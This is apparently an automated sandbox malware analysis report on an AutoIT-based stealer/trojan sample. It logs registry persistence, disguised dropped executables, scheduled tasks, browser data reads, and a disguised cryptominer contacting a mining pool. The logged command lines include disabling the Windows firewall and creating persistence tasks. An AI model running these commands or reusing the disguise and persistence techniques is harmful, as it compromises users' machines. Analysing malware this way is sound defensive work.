Malware Analysis Report

2024-11-16 13:22

Sample ID 240614-ef3w1ayaml
Target c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225
SHA256 c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225
Tags
evasion persistence spyware stealer trojan
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225

Threat Level: Likely malicious

The file c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225 was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence spyware stealer trojan

Modifies Installed Components in the registry

Modifies Windows Firewall

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Adds Run key to start application

Checks whether UAC is enabled

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 03:53

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 03:53

Reported

2024-06-14 03:56

Platform

win7-20240508-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

Signatures

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\Version = "12,1,7601,17714" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\StubPath = "\"C:\\Program Files\\Common Files\\System\\ado\\de-DE\\sidebar.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\Version = "12,1,7601,17714" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\StubPath = "\"C:\\Program Files\\Common Files\\System\\ado\\de-DE\\sidebar.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CTFMon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\ctfmon.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\BTModemProtection = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\tt\\BTModemProtection.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppExtender = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\lt\\AppExtB.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher = "\"C:\\Program Files\\Microsoft Games\\SpiderSolitaire\\es-ES\\Reader_sl.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CTFMon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\ctfmon.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\BTModemProtection = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\tt\\BTModemProtection.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppExtender = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\lt\\AppExtB.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher = "\"C:\\Program Files\\Microsoft Games\\SpiderSolitaire\\es-ES\\Reader_sl.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\de-DE\~tqiltyd.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Common Files\System\ado\de-DE\sidebar.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\~pngjvft.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\~tseyeab.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\~jjiocdl.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\de-DE\sidebar.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\~ymrncmc.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 2304 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 2304 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 2304 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

"C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 7 /TN "Adobe Reader Speed Launcher" /TR "\"C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 14 /TN "CTFMon" /TR "\"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 32 /TN "BTModemProtection" /TR "\"C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "CTFMon" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\ctfmon.exe\""

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" firewall set opmode mode=DISABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 7 /TN "Adobe Reader Speed Launcher" /TR "\"C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 14 /TN "CTFMon" /TR "\"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 32 /TN "BTModemProtection" /TR "\"C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "CTFMon" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\ctfmon.exe\""

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

Network

Country Destination Domain Proto
US 8.8.8.8:53 ypool.net udp

Files

memory/1868-0-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\~e8833c24.exe

MD5 0db351c2c43f243ea9335c8b8b58b6a0
SHA1 5b2d295d4b2a489bad864896d73e0ea26c2d50cf
SHA256 ce544d0f3b44382b5a0f7632c3bba2cf2ec470d8744513fbba1e7dab2c5b23b4
SHA512 cc2201665d3dd4ac72f387b97a97442fde1b2908024c409410a4f4a368030080ecd9e5e9412095003bfcaf4f224d39219ab6c64b942c505961dc8814de82bbf6

memory/2304-13-0x0000000002300000-0x0000000002301000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\~hohtaou.tmp

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

MD5 5eb5360cf19e9c0280f6e1b0f944d450
SHA1 c7ce09623b495acb79c6cfa7129be28abc6dc140
SHA256 17088be03a4c3f40638a87b8c5faf03acca53fa473b0aa34951595595deeadcd
SHA512 cd88c396983fceb073aa1e995e11ebfc9393d536c61bf1abcfc9d65b78121edec060e8886f21c546264ec99636ae7c82f1cbb8c73f77861df3bb9382ba17c980

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 03:53

Reported

2024-06-14 03:56

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

Signatures

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\StubPath = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\iTunesHelper.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\Version = "12,1,7601,17714" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\StubPath = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\iTunesHelper.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\Version = "12,1,7601,17714" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DAEMON Tools Lite = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\Windows\\Installer\\{90160000-006E-0409-1000-0000000FF1CE}\\DTLite.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IDT PC Audio = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\bs\\LC_MESSAGES\\sttray64.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IntelAPMClient = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\amclient.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComAgent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\ComAgent.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DAEMON Tools Lite = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\Windows\\Installer\\{90160000-006E-0409-1000-0000000FF1CE}\\DTLite.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IDT PC Audio = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\bs\\LC_MESSAGES\\sttray64.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IntelAPMClient = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\amclient.exe\"" C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComAgent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\ComAgent.exe\"" C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\~zfqldnq.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\~cinivab.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\~knvgihv.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_2019.430.2026.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\~pxycziy.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\~gknjcsz.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\~knvgihv.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PlaceCard\contrast-white\~lnugsvv.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\~bvvdmbp.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\~suhwevh.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\~zfqldnq.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\~njxvzlc.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\~qzkwnlh.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
